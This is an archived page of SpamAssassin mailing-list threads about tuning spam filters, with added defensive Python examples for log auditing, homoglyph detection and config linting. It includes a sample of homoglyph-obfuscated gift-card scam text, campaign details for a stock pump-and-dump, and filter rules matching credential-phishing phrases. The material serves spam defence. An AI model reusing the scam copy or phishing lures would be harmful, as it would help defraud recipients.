'mx' matched)) receiver=intsrv036; identity=mailfrom;
envelope-from=laura...@semarh.goias.gov.br;
helo=as.segplan.go.gov.br; client-ip=189.2.188.131
Received: from as.segplan.go.gov.br (as.segplan.go.gov.br [189.2.188.131])
by mx1.mydomain.com (Postfix) with SMTP id DEEE41A0057;
Tue,  9 Sep 2014 23:31:24 -0300 (BRT)
Received: from artemis.ecomunic.goias.gov.br (unknown [10.6.1.16])
by as.segplan.go.gov.br (Postfix) with SMTP id B2D617B902;
Tue,  9 Sep 2014 23:20:34 -0300 (BRT)
X-Virus-Scanned: amavisd-new at artemis.ecomunic.goias.gov.br
Date: Tue, 9 Sep 2014 23:20:31 -0300 (BRT)
From: Web Admin laura...@semarh.goias.gov.br
Message-ID: 97597813.546385.1410315631612.javamail.r...@semarh.goias.gov.br
Subject: att
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: [10.6.128.44]
X-Mailer: Zimbra 7.2.7_GA_2942 (zclient/7.2.7_GA_2942)
To: undisclosed-recipients:;


Sep  9 23:31:39 intsrv044 postfix/smtpd[22327]: B3DEB2A016F:
client=localhost[127.0.0.1]
Sep  9 23:31:39 intsrv044 postfix/cleanup[22033]: B3DEB2A016F:
message-id=97597813.546385.1410315631612.javamail.r...@semarh.goias.gov.br
Sep  9 23:31:39 intsrv044 postfix/qmgr[11246]: B3DEB2A016F:
from=laura...@semarh.goias.gov.br, size=2665, nrcpt=20 (queue
active)
Sep  9 23:31:39 intsrv044 amavis[18826]: (18826-11) Passed CLEAN
{RelayedInbound}, [IP_MX1]:35863 [189.2.188.131]
laura...@semarh.goias.gov.br ->
agnaldo.l...@mydomain.com,a...@mydomain.com,ama...@mydomain.com,arno...@mydomain.com,auri...@mydomain.com,caio.pinhe...@mydomain.com,carne...@mydomain.com,c...@mydomain.com,centraldeservi...@mydomain.com,cinthya.dioge...@mydomain.com,claudiana.ama...@mydomain.com,concessao...@mydomain.com,crist...@mydomain.com,cs...@mydomain.com,cu...@mydomain.com,danielly.cu...@mydomain.com,den...@mydomain.com,et...@mydomain.com,helen...@mydomain.com,jcarlos.l...@mydomain.com,
Queue-ID: A55772A016D, Message-ID:
97597813.546385.1410315631612.javamail.r...@semarh.goias.gov.br,
mail_id: lTZPuM5PkD9Y, Hits: -200.771, size: 1984, queued_as:
B3DEB2A016F, 2073 ms
Sep  9 23:31:39 intsrv044 postfix/lmtp[20175]: A55772A016D:
to=agnaldo.l...@mydomain.com, relay=127.0.0.1[127.0.0.1]:10024,
delay=2.1, delays=0.04/0/0/2.1, dsn=2.0.0, status=sent (250 2.0.0 from
MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as B3DEB2A016F)
Sep  9 23:31:39 intsrv044 postfix/lmtp[20175]: A55772A016D:
to=a...@mydomain.com, relay=127.0.0.1[127.0.0.1]:10024, delay=2.1,
delays=0.04/0/0/2.1, dsn=2.0.0, status=sent (250 2.0.0 from
MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as B3DEB2A016F)
Sep  9 

Re: Whitelist one mail with multiple destinations

2014-09-10 Thread M. Rodrigo Monteiro
2014-09-10 10:23 GMT-03:00 David F. Skoll d...@roaringpenguin.com:
> Option 2 is to accept the message unfiltered, split it into multiple copies,
> and remail each copy so it can be scanned per-recipient.  This avoids
> the delay, but it also means you cannot reject spam with a 5xx SMTP failure
> code or you'll be blacklisted for backscatter.

How can I do it?
All my spam passes; none is blocked. It's no problem not to reject them.


> Here at Roaring Penguin, we picked Option 2 as the lesser of the two
> evils.
>
> Regards,
>
> David.

Thanks,
Rodrigo.


Re: Whitelist one mail with multiple destinations

2014-09-10 Thread M. Rodrigo Monteiro
2014-09-10 10:17 GMT-03:00 Antony Stone
antony.st...@spamassassin.open.source.it:
> On Wednesday 10 September 2014 at 14:56:06 (EU time), M. Rodrigo Monteiro
> wrote:
>
>> Hi. Here is my scenario:
>>
>> Internet - MX (Postfix) - Relay (Postfix + Amavis with SpamAssassin) -
>> Zimbra
>>
>> My problem is that when an e-mail comes to multiple destinations and
>> one of them is whitelisted, all these destinations become whitelisted
>> too.
>
> Looks like you want to set smtp_destination_recipient_limit = 1 in your front
> end (MX) postfix setup:
>
> http://postfix.1071664.n5.nabble.com/Split-multiple-recipient-mail-td48458.html

That did not work. I tested both on the MX and the Relay. Still the same problem.

# postconf smtp_destination_recipient_limit
smtp_destination_recipient_limit = $default_destination_recipient_limit
# postconf default_destination_recipient_limit
default_destination_recipient_limit = 1
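One way to audit a relay for the leakage described in this thread from its logs alone, as an added example that is not code from the thread, from Postfix or from amavisd-new: it joins the qmgr recipient count with the amavis verdict by queue id and reports multi-recipient messages that passed with a score at or below the whitelist level. The sample log lines are constructed in the page's format; hosts, addresses and most queue ids are placeholders.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample lines modelled on the Postfix/amavisd-new log in the thread.
# Hosts, addresses, mail_ids and most queue ids are placeholders, not from any real system.
SAMPLE_LOG = """\
Sep  9 23:31:39 relay postfix/qmgr[11246]: B3DEB2A016F: from=<sender@example.net>, size=2665, nrcpt=20 (queue active)
Sep  9 23:31:39 relay amavis[18826]: (18826-11) Passed CLEAN {RelayedInbound}, [192.0.2.10]:35863 [198.51.100.7] <sender@example.net> -> <a@mydomain.example>,<cs@mydomain.example>, Queue-ID: A55772A016D, Message-ID: <1@example.net>, mail_id: lTZPuM5PkD9Y, Hits: -200.771, size: 1984, queued_as: B3DEB2A016F, 2073 ms
Sep  9 23:32:01 relay postfix/qmgr[11246]: C0FFEE00001: from=<news@example.org>, size=5120, nrcpt=1 (queue active)
Sep  9 23:32:01 relay amavis[18827]: (18827-02) Passed CLEAN {RelayedInbound}, [192.0.2.10]:35870 [203.0.113.9] <news@example.org> -> <cs@mydomain.example>, Queue-ID: D00D00000A1, Message-ID: <2@example.org>, mail_id: bbbbbbbbbbbb, Hits: -199.2, size: 4000, queued_as: C0FFEE00001, 1500 ms
Sep  9 23:33:10 relay postfix/qmgr[11246]: BAADF00D002: from=<list@example.com>, size=9000, nrcpt=12 (queue active)
Sep  9 23:33:10 relay amavis[18828]: (18828-05) Passed CLEAN {RelayedInbound}, [192.0.2.10]:35881 [203.0.113.22] <list@example.com> -> <a@mydomain.example>, Queue-ID: FEEDFACE003, Message-ID: <3@example.com>, mail_id: cccccccccccc, Hits: 1.3, size: 8500, queued_as: BAADF00D002, 900 ms
"""

# qmgr logs the envelope recipient count once per queue id.
QMGR_RE = re.compile(
    r"postfix/qmgr\[\d+\]: (?P<qid>[0-9A-Fa-f]+): from=<(?P<sender>[^>]*)>, "
    r"size=\d+, nrcpt=(?P<nrcpt>\d+)"
)
# amavis logs the SpamAssassin total as "Hits:" and, for passed mail, the
# post-filter queue id as "queued_as:".
AMAVIS_RE = re.compile(
    r"amavis\[\d+\]: \(\S+\) (?P<verdict>Passed|Blocked) (?P<category>\S+) .*?"
    r"Queue-ID: (?P<qid>[0-9A-Fa-f]+),.*? Hits: (?P<hits>-?\d+(?:\.\d+)?),"
    r"(?:.*? queued_as: (?P<queued_as>[0-9A-Fa-f]+))?"
)


def parse_log(log_text: str) -> Tuple[Dict[str, Tuple[int, str]], List[dict]]:
    """Return (queue id -> (nrcpt, sender), list of amavis verdict records)."""
    nrcpt_by_qid: Dict[str, Tuple[int, str]] = {}
    verdicts: List[dict] = []
    for line in log_text.splitlines():
        m = QMGR_RE.search(line)
        if m:
            nrcpt_by_qid[m["qid"]] = (int(m["nrcpt"]), m["sender"])
            continue
        m = AMAVIS_RE.search(line)
        if m:
            verdicts.append({
                "verdict": m["verdict"],
                "category": m["category"],
                "queue_id": m["qid"],
                "queued_as": m["queued_as"],
                "hits": float(m["hits"]),
            })
    return nrcpt_by_qid, verdicts


def find_whitelist_leaks(log_text: str, threshold: float = -100.0,
                         min_rcpt: int = 2) -> List[dict]:
    """Messages scanned once for several recipients that passed with a score at or
    below `threshold`. A total that negative is normally only reachable through a
    whitelist rule, and in a multi-recipient scan that rule covered every recipient.
    Set `threshold` to your local whitelist score (-200 in the thread)."""
    nrcpt_by_qid, verdicts = parse_log(log_text)
    leaks: List[dict] = []
    for v in verdicts:
        # The recipient count may be logged under the pre- or the post-filter queue id.
        info = nrcpt_by_qid.get(v["queued_as"] or "") or nrcpt_by_qid.get(v["queue_id"])
        if info is None:
            continue
        nrcpt, sender = info
        if v["verdict"] == "Passed" and nrcpt >= min_rcpt and v["hits"] <= threshold:
            leaks.append({"queue_id": v["queued_as"] or v["queue_id"], "sender": sender,
                          "nrcpt": nrcpt, "hits": v["hits"]})
    return leaks


if __name__ == "__main__":
    for leak in find_whitelist_leaks(SAMPLE_LOG):
        print(f"{leak['queue_id']}: {leak['nrcpt']} recipients, hits {leak['hits']} "
              f"from {leak['sender']} -- whitelist likely applied to all recipients")
```

Postfix applies a per-transport transport_destination_recipient_limit (or a -o override in master.cf) ahead of default_destination_recipient_limit, so the limit that decides whether amavis sees one recipient per scan is the one for the transport that feeds it; the log in the first post shows that transport is an lmtp client.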


Re: spam with hashes and

2014-08-17 Thread Rajesh M.
hi

my spamassassin version is: 3.2.5

the body content message source is like this. how do i block these?

&#x13DF;&#x043E;m&#x0440;l&#x0435;t&#x0435; th&#x0435; &#x039A;&#x043E;hl'&#x0455; Surv&#x0435;&#x0443;!
&#x13DF;l&#x0430;&#x0456;m &#x0443;&#x043E;ur $25 &#x039A;&#x043E;hl'&#x0455; G&#x0456;ft &#x13DF;&#x0430;rd!
&#x13B3;&#x0456;nt&#x0435;r &#x0456;&#x0455; h&#x0435;r&#x0435; &#x0430;nd th&#x0435; w&#x0435;&#x0430;th&#x0435;r &#x0456;&#x0455; ch&#x0456;ll&#x0443;, f&#x0430;ll f&#x0430;&#x0455;h&#x0456;&#x043E;n h&#x0430;&#x0455; &#x0455;l&#x043E;wl&#x0443; ch&#x0430;ng&#x0435;d t&#x043E; w&#x0456;nt&#x0435;r f&#x0430;&#x0455;h&#x0456;&#x043E;n.
&#x039A;&#x043E;hl'&#x0455; &#x042C;r&#x0456;ng&#x0435; &#x0443;&#x043E;u &#x0430;m&#x0430;z&#x0456;ng n&#x0435;w &#x0455;t&#x0443;l&#x0435;&#x0455; w&#x0456;th &#x0456;t&#x0455; &#x13B3;&#x0456;nt&#x0435;r &#x13DF;&#x043E;ll&#x0435;ct&#x0456;&#x043E;n&#x0455;, &#x0455;&#x043E; &#x0443;&#x043E;u c&#x0430;n l&#x043E;&#x043E;k &#x0430;nd f&#x0435;&#x0435;l gr&#x0435;&#x0430;t t&#x043E;&#x043E;!
H&#x0430;v&#x0435; &#x0443;&#x043E;u &#x042C;r&#x043E;w&#x0455;&#x0435;d th&#x0435; l&#x0430;t&#x0435;&#x0455;t w&#x0456;nt&#x0435;r-&#x0456;n&#x0455;&#x0440;&#x0456;r&#x0435;d &#x0455;t&#x0443;l&#x0435;&#x0455; &#x0430;t &#x039A;&#x043E;hl'&#x0455;?
Sh&#x0430;r&#x0435; &#x0443;&#x043E;ur f&#x0430;&#x0455;h&#x0456;&#x043E;n &#x043E;&#x0440;&#x0456;n&#x0456;&#x043E;n &#x0430;nd cl&#x0430;&#x0456;m &#x0443;&#x043E;ur &#x039A;&#x043E;hl'&#x0455; g&#x0456;ft c&#x0430;rd!
&#x13AA;ll Y&#x043E;u N&#x0435;&#x0435;d t&#x043E; D&#x043E; &#x0456;&#x0455;:
1. R&#x0435;g&#x0456;&#x0455;t&#x0435;r
2. &#x13DF;&#x043E;m&#x0440;l&#x0435;t&#x0435; th&#x0435; Surv&#x0435;&#x0443;
3. &#x13DF;l&#x0430;&#x0456;m Y&#x043E;ur G&#x0456;ft &#x13DF;&#x0430;rd
St&#x0430;rt n&#x043E;w!

rajesh

- Original Message -
From: Alex [mailto:mysqlstud...@gmail.com]
To: users@spamassassin.apache.org
Sent: Fri, 15 Aug 2014 22:28:49 -0400
Subject: Re: spam with hashes and 
> Hi, we are getting spam with a lot of hashes &#x13AC;m&#x0430 i checked out KAM.cf but not able to trap such emails

Post a sample with all the message headers to pastebin.com so it can be reviewed.
Provide information about your version of spamassassin you're currently using, and any changes you may have made (including the use of KAM.cf) to try and block them.

Regards,
Alex
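To make a sample like the one posted above readable and scorable, a decoder for the numeric character references plus a mixed-script check, as an added example (not code from the thread, from KAM.cf or from SpamAssassin): each &#x...; reference is decoded, then every word is checked for letters drawn from more than one Unicode script, which is exactly what the Cyrillic and Cherokee look-alikes produce. The sample body is a constructed excerpt in the posted message's style.

```python
import html
import re
import unicodedata
from typing import List, Set, Tuple

# Constructed excerpt in the style of the sample Rajesh posted: Latin text with single
# letters replaced by look-alikes from the Cyrillic and Cherokee blocks, written as HTML
# numeric character references. The plain-ASCII sentence is a control.
SAMPLE_BODY = (
    "&#x13DF;&#x043E;m&#x0440;l&#x0435;t&#x0435; th&#x0435; Surv&#x0435;&#x0443;! "
    "Normal text in plain ASCII stays untouched."
)

# \w on str patterns matches Unicode letters, so Cyrillic and Cherokee count as word chars.
WORD_RE = re.compile(r"\w+")


def decode_numeric_refs(text: str) -> str:
    """Turn &#xNNNN; / &#NNN; references back into the characters a mail client renders."""
    return html.unescape(text)


def script_of(ch: str) -> str:
    """First word of the Unicode character name: LATIN, CYRILLIC, CHEROKEE, GREEK, ..."""
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def scripts_in_word(word: str) -> Set[str]:
    """Set of scripts the letters of one word are drawn from."""
    return {script_of(ch) for ch in word if ch.isalpha()}


def mixed_script_words(text: str) -> List[Tuple[str, Set[str]]]:
    """Words whose letters come from more than one script, after decoding references.
    Ordinary text almost never mixes Latin with Cyrillic or Cherokee inside one word."""
    decoded = decode_numeric_refs(text)
    out: List[Tuple[str, Set[str]]] = []
    for word in WORD_RE.findall(decoded):
        scripts = scripts_in_word(word)
        if len(scripts) > 1:
            out.append((word, scripts))
    return out


def mixed_script_ratio(text: str) -> float:
    """Share of alphabetic words that mix scripts; a body-level figure to threshold on."""
    decoded = decode_numeric_refs(text)
    words = [w for w in WORD_RE.findall(decoded) if any(c.isalpha() for c in w)]
    if not words:
        return 0.0
    mixed = sum(1 for w in words if len(scripts_in_word(w)) > 1)
    return mixed / len(words)


if __name__ == "__main__":
    for word, scripts in mixed_script_words(SAMPLE_BODY):
        print(f"{word!r}: {sorted(scripts)}")
    print(f"mixed-script ratio: {mixed_script_ratio(SAMPLE_BODY):.2f}")
```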



spam with hashes and

2014-08-15 Thread Rajesh M.
hi

we are getting spam with a lot of hashes &#x13AC;m&#x0430

i checked out KAM.cf but am not able to trap such emails

any solution, please?

thanks
rajesh



Bypass URIBL_BLACK check for 1 domain

2014-07-29 Thread M. Rodrigo Monteiro
Hi.

How can I bypass this check only for my domain, say mydomain.com?



M. Rodrigo Monteiro
fale...@rodrigomonteiro.net  http://twitter.com/MarcioRodrigoM/
http://www.facebook.com/mrodrigom/
http://br.linkedin.com/pub/m%C3%A1rcio-rodrigo-de-oliveira-monteiro/28/491/3b8
  http://foursquare.com/marciorodrigom fale...@rodrigomonteiro.net
fale...@rodrigomonteiro.net
Free as in Freedom, not free as in free beer
As we are liberated from our own fear, our presence automatically
liberates others
Linux User # 403730

Pense antes de imprimir. Think before printing.

LEGAL ADVICE
This message is exclusively destined for the people to whom it is directed,
and it can bear private and/or legally exceptional information. If you are
not addressee of this message, since now you are advised to not release,
copy, distribute, check or, otherwise, use the information contained in
this message, because it is illegal. If you received this message by
mistake, we ask you to return this email, making possible, as soon as
possible, the elimination of its contents of your database, registrations
or controls system. The message that bears any mandatory links, issued by
someone who has no representation powers, shall be null or void.


Re: Bypass URIBL_BLACK check for 1 domain

2014-07-29 Thread M. Rodrigo Monteiro
2014-07-29 13:18 GMT-03:00 Benny Pedersen m...@junc.eu:

> disabling html postings with big signature could be a start?

How does disabling HTML help me?
If you have the answer to what I've asked, then it's fine to respond to my
question, like Axb did.
If not, please don't bother to answer.


Best regards,
Rodrigo.


block newsletter type spam with long url

2014-07-23 Thread Rajesh M.
hi

we are getting spam with long url links to external websites. sometimes the links are hundreds of characters long.

a few examples are given below

basically i need to block any url which contains several alphanumeric characters at the end.

http://domainname.com/dfd/b7e7c7f=a5d66e_a4404d9

is there any rule to block these?
could somebody guide me on this, please?

thank you,
rajesh



Re: block newsletter type spam with long url

2014-07-23 Thread Rajesh M.
but i need such a rule. if you can guide me, please let me know.

- Original Message -
From: Axb [mailto:axb.li...@gmail.com]
To: users@spamassassin.apache.org
Sent: Wed, 23 Jul 2014 09:32:38 +0200
Subject: Re: block newsletter type spam with long url

Seems you are repeating yourself

On 07/23/2014 09:09 AM, Rajesh M. wrote:
> hi
> we are getting spam with long url links to external websites. some times the links are hundreds of characters long.
> few examples given below
> basically i need to block any url which contains several alphanumeric characters at the end.

Not a very good idea. Lots of legitimate mail has such URL patterns



Re: block newsletter type spam with long url

2014-07-23 Thread Rajesh M.
kevin

can you please post the kam.cf file online?

i understand some basics but am not good at these.

rajesh

- Original Message -
From: Kevin A. McGrail [mailto:kmcgr...@pccc.com]
To: axb.li...@gmail.com,users@spamassassin.apache.org
Sent: Wed, 23 Jul 2014 08:31:28 -0400
Subject: Re: block newsletter type spam with long url

On 7/23/2014 3:32 AM, Axb wrote:
>> basically i need to block any url which contains several alphanumeric characters at the end.
> Not a very good idea. Lots of legitimate mail has such URL patterns

Agreed. We have seen some patterns with these URLs that we block in KAM.cf but only as a meta.

Regards,
KAM



block newsletter type spam with long url

2014-07-22 Thread Rajesh M.
hi

we are getting spam with long url links to external websites. sometimes the links are hundreds of characters long.

a few examples are given below

is there any rule to block these?

basically i need to block any url which contains several alphanumeric characters at the end.

http://x.com/uquote/b7e7c7f955d9af8c5ef=a5d66e_a4404d9
http://www..us/l/lt1N2743MF255X/719V2211P5437V161

thank you,
rajesh



[Fwd: Rule Update!]

2014-06-16 Thread David Alexandre M. de Carvalho
Good morning.
I can also confirm that the rules were updated on my server.
Thanks!



No new rules since April 19th?

2014-06-12 Thread David Alexandre M. de Carvalho

Hello! I'm using SpamAssassin 3.3.1-2 on two of my servers.
Recently I've noticed that there haven't been updates on either of the channels I use
(updates.spamassassin.org and sough.rules.yerp.org).
Does this mean that there won't be any more updates for version 3.3.1-2?
Thanks and regards!
David


Rule header from

2014-05-21 Thread M. Rodrigo Monteiro
Hi.

How do I create a rule to tag e-mails from *@word.*.com.br?

This is what I tested:
header TEST From =~ /.*\@word\..*\.com\.br/i

SA 3.4




RE: SPAM from a registrar

2014-05-16 Thread Chip M.
James, are these botnet or snowshoe spam?

When you get a chance, please provide some spamples (pastebin or 
elsewhere), as Kevin recommended.  Please mung JUST the email
addresses (e.g. change all email domains to example.com, and
change the victim account name to victim).  If the victim
accounts are NOT spamtraps/honeypots, don't worry about the other
headers, since you _DO_ want spammers to listwash you. :)

There's a high probability that others are seeing the same
campaign and can provide much better advice if we can see
exactly what you are seeing.
You ARE asking good questions, we just need a bit more data.


> Along the same lines, is there any test to determine the country
> of origin of the IP address in the last hop before it connects
> to our servers?

http://wiki.apache.org/spamassassin/RelayCountryPlugin

I've been using a homebrew equivalent for more than nine years,
and it's VERY helpful.

The downside is that it can also crank up your FP rate.

I only recommend using it if you have a decent quarantine and
retesting tool.

For example, I score VERY aggressively on IP-to-Nation and on
TLD-to-Nation tests, then retest (with a different balance of
scores) typically about 1 to 48 hours after initial arrival, at
which point more than 99% are on multiple reliable blocklists.
I briefly hand check the rest.  That takes much of the stress and
uncertainty out of filtering. :)
- Chip



Score Problem

2014-05-14 Thread M. Rodrigo Monteiro
Hi All.

Below is my SA.
The problem is that the score is 0.0, but the debug log shows the rules got hit.
What am I missing?

= Init =
/usr/bin/perl -T -w /usr/local/bin/spamd -D -d -c -m24 --username
spamfilter -H /opt/spamassassin -s /opt/spamassassin/spamassassin.log -r
/var/run/spamd.pid
= Init =

= Version =
SpamAssassin 3.4.0 (tar.gz) on CentOS 6.5
= Version =

= local.cf =
body __REGRALOCAL01 /nome e sobrenome/i
body __REGRALOCAL02 /confirme a senha/i
meta __REGRALOCAL_USUARIO_SENHA (__REGRALOCAL01 && __REGRALOCAL02)
score __REGRALOCAL_USUARIO_SENHA 4.0

body __REGRALOCAL03 /nome de usu/i
body __REGRALOCAL04 /senha/i
meta __REGRALOCAL_USUARIO_SENHA02 (__REGRALOCAL03 && __REGRALOCAL04)
score __REGRALOCAL_USUARIO_SENHA02 4.0

body __REGRALOCAL05 /e-mail/i
body __REGRALOCAL06 /senha/i
body __REGRALOCAL07 /conta/i
meta __REGRALOCAL_USUARIO_SENHA03 (__REGRALOCAL05 && __REGRALOCAL06 && __REGRALOCAL07)
score __REGRALOCAL_USUARIO_SENHA03 4.0

body __REGRALOCAL_REVALIDAR /clique aqui para revalidar/i
score __REGRALOCAL_REVALIDAR 4.0

body __REGRALOCAL_VALIDAR_CONTA /validar conta/i
score __REGRALOCAL_VALIDAR_CONTA 4.0

body __REGRALOCAL_YOLASITE02 /seu e-mail id precisa ser atualizado com o nosso/i
score __REGRALOCAL_YOLASITE02 4.0

body __REGRALOCAL_SENHA /confirmar senha/i
score __REGRALOCAL_SENHA 4.0

body __REGRALOCAL_SENHA02 /confirmar a senha/i
score __REGRALOCAL_SENHA02 4.0
= local.cf =

= SA Debug log =
Tue May 13 15:27:26 2014 [17813] dbg: rules: running body tests; score so
far=0
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL07
== got hit: conta
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule
__REGRALOCAL_SENHA == got hit: Confirmar senha
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL03
== got hit: Nome de usu
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL04
== got hit: Senha
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL05
== got hit: e-mail
= SA log =

= mail header =
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
xx.x.xxx
X-Spam-Level:
X-Spam-Status: No, score=0.0 required=4.0 tests=HTML_MESSAGE,T_REMOTE_IMAGE
shortcircuit=no autolearn=ham autolearn_force=no version=3.4.0
= mail header =

Regards,
Rodrigo





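A small lint over a local.cf in the shape of the one in the Score Problem post above, as an added example that is not spamassassin --lint and not code from the thread: it flags score lines on __ subrules, which SpamAssassin evaluates but never adds to the total, together with meta expressions that reference an undefined rule or have two rule names with no operator between them. The sample config reuses the thread's __REGRALOCAL names; the LOCAL_* names are invented.

```python
import re
from typing import Dict, List, Tuple

# Constructed local.cf in the style of the one posted in the thread. The __REGRALOCAL*
# names are the thread's; the LOCAL_* rules are invented so a clean scored meta sits
# next to the faulty lines.
SAMPLE_LOCAL_CF = """\
body __REGRALOCAL01 /nome e sobrenome/i
body __REGRALOCAL02 /confirme a senha/i
meta __REGRALOCAL_USUARIO_SENHA (__REGRALOCAL01 && __REGRALOCAL02)
score __REGRALOCAL_USUARIO_SENHA 4.0

body __REGRALOCAL03 /nome de usu/i
body __REGRALOCAL04 /senha/i
meta LOCAL_USUARIO_SENHA02 (__REGRALOCAL03  __REGRALOCAL04)
score LOCAL_USUARIO_SENHA02 4.0

meta LOCAL_VALIDAR (__REGRALOCAL_VALIDAR_CONTA && __REGRALOCAL04)
score LOCAL_VALIDAR 4.0

body __LOCAL_SENHA /confirmar senha/i
meta LOCAL_SENHA __LOCAL_SENHA
score LOCAL_SENHA 4.0
"""

RULE_KINDS = {"header", "body", "rawbody", "full", "uri", "meta"}
NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def parse_cf(text: str) -> Tuple[Dict[str, str], Dict[str, Tuple[int, str]], Dict[str, int]]:
    """Return (defined rule -> kind, meta name -> (line, expression), scored rule -> line)."""
    defined: Dict[str, str] = {}
    metas: Dict[str, Tuple[int, str]] = {}
    scores: Dict[str, int] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        kind, name = parts[0], parts[1]
        rest = parts[2] if len(parts) > 2 else ""
        if kind in RULE_KINDS:
            defined[name] = kind
            if kind == "meta":
                metas[name] = (lineno, rest)
        elif kind == "score":
            scores[name] = lineno
    return defined, metas, scores


def lint_cf(text: str) -> List[Tuple[int, str, str]]:
    """Findings as (line, code, message), sorted by line."""
    defined, metas, scores = parse_cf(text)
    findings: List[Tuple[int, str, str]] = []
    for name, lineno in scores.items():
        # Rules named with a leading __ are subrules: SpamAssassin runs them (hence the
        # "got hit" debug lines) but never adds their score. Only a meta that uses them,
        # or the same rule renamed without the __, can add to the total.
        if name.startswith("__"):
            findings.append((lineno, "SUBRULE_SCORED",
                             f"score on subrule {name} has no effect; rename it without "
                             f"the leading __ or reference it from a scored meta"))
    for name, (lineno, expr) in metas.items():
        for ref in NAME_RE.findall(expr):
            if ref not in defined:
                findings.append((lineno, "META_UNDEFINED_RULE",
                                 f"meta {name} references {ref}, which is not defined in "
                                 f"this file (check other .cf files or fix the name)"))
        # Reduce the expression to a skeleton: rule names become R, spaces and
        # parentheses go. Two adjacent R's mean an operator (&&, ||) is missing,
        # which is what an HTML-mangled "&&" looks like after extraction.
        skeleton = re.sub(r"[\s()]", "", NAME_RE.sub("R", expr))
        if "RR" in skeleton:
            findings.append((lineno, "META_MISSING_OPERATOR",
                             f"meta {name}: two rule names with no operator between them"))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, code, msg in lint_cf(SAMPLE_LOCAL_CF):
        print(f"line {lineno}: {code}: {msg}")
```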

Re: unusual new pump-and-dump campaign (RCHA)

2014-04-16 Thread Chip M.
Thanks Alex! :)

As Alex's rules imply, it switched over to 100% image spam
(in my spamtraps), and continued its excellent syncing.

Just on April 11, the volume more than tripled, and it hit many
more different spamtraps than on all previous days.  Some of those traps
had never been hit before, and/or are of esoteric origin.

Today, it's completely gone.

Instead, I'm seeing what looks like another calibration run.
What's odd is that _ALL_ the Message-IDs are of the form:
999.999...@f99.my.com
where 9 is a number.
Note that the f99 is either one or two digits (mostly two).

As I mentioned, the image spams' generated Message-IDs were also
consistent.  Whenever the next payload hits, there's a fair chance
there may be a useful pattern in that field.

I've also seen at least three new waves of malware attachments,
all small, and hitting some of the rare traps that the 
stock and calibration payloads have hit.

I have NEVER seen anything like this botnet.
- Chip

P.S.  If it's of use to anybody, we maintain a list of 
scammed stock symbols and scammer phone numbers:
http://puffin.net/software/spam/symbols.php
I'm planning to do some datamining to publish date ranges
just for the stock symbols.
That will have to wait until I've finished my MASSIVE Snowshoe
datamining and publishing effort.  Stay tuned for that, probably
in dribs & drabs as my work schedule permits. :)




unusual new pump-and-dump campaign (RCHA)

2014-04-08 Thread Chip M.
Starting Apr 5, about _HALF_ of our spam volume is a 
new pump and dump campaign for stock symbol RCHA.

As well as the high volume, there are several noteworthy 
characteristics:
 - victim account name is used as the sender/From account name
 - very clean HTML
 - very few hits on non-DNS/RBL SpamAssassin tests
 - separate HTML-only and image-payload variants
   (images are very low volume, so far)
 - all HTML variants include well formed unsubscribe headers
 - for the first half day the symbol was unobfuscated, then it
   changed to common gappy forms (e.g. R_C_H_A, R*C*H*A)
 - botnet seems VERY well synchronized with its C&C
 - hit some Tagged accounts that were part of major data breaches
   (including both LinkedIn and WellsFargo)

That last point REALLY jumped out.
Previously, almost all of my LI and WF breach spam has been
boy parts related.
That's how I first noticed this campaign, via a trigger that 
flags all breach spam, even before my new-symbol-hunter runs.

Full sample (with obviously redacted email addresses):
http://puffin.net/software/spam/samples/0013_pump_and_dump.txt
I left the Message-ID and other coded headers NON redacted, 
since that spample hit an unimportant spamtrap, 
and those headers might be of interest.


So far, there have been some very consistent headers, which all 
have changed at the same time (i.e. new template) with (so far) 
no gaps, so this botnet seems VERY well synced (compared to what
I've seen in the past).
Starting today, there are two templates that are active.


*** HTML variant...

The From Realname has been one of:
iStockAdvisor
SuperStock Advisor
iStocksInformer
iGoldenStocks
iMarketWatchers
iStockMarketInsider
MarketClub Top Stocks
(listed in order of appearance)

The Subject header has been one of:
One stock Five times your principal 
A biotech company that will make you big bucks
This pharmaceutical could quadruple fast
This is the opportunity of the year
The last tip I gave you tripled your principal
Top 5 Trending Stocks
Don't you deserve an edge in the market?

All contain a Reply-To, which matches the From/SMTP-Sender.

X-Mailer is:
WhatCounts
which does occur in legit ESP emails.

One of the early HTML templates contained three footer 
links (About/Legal/Unsub), which use the victim account name
with dot com.  I don't recall ever seeing that pattern.
Today's two HTML templates contain one footer unsub link,
with the same fake domain pattern.


*** Image variant (either GIF or JPEG)...

From Realnames:
iBuyStock
iTopStocksPicker
iSelectedStocks
iTriplingStocks

Subjects:
The best stocktip for VICTIM-ACCOUNT-NAME
This little company could tenfold your investment, VICTIM-ACCOUNT-NAME
Dear VICTIM-ACCOUNT-NAME, Three hundred percent gains is super possible
Where VICTIM-ACCOUNT-NAME is the victim's email account name.

Within each template, the Image properties have been the exact 
same, and appear to be the same (just eyeballing them, not 
binary comparisons).

They all have a medium sized block (~2K chars) of Bayes salad.
EACH salad and image filename is completely different.

They do not contain unsubscribe links, or any extra headers.

The Message-ID always ends with the victim's domain name, 
NOT the sender (the HTML versions contain standard botnet M-IDs).

All are getting thru SA, however most are hitting:
HTML_IMAGE_ONLY_28 or HTML_IMAGE_ONLY_32
DC_GIF_UNO_LARGO


*** Botnet prep signs:
Around mid-March, our malware attachments volume shot up to
about six times the average for 2014.

In late March, there was what looked like a standard botnet
calibration run, which was probably for this botnet.
I just re-skimmed thru some of those, and the only notable
headers were avast X-Antivirus and X-Mailer with a fake value.


*** Rules:
Originally, these were dying mostly due to Nation-of-IP and 
my custom anti-stocks body word tests.

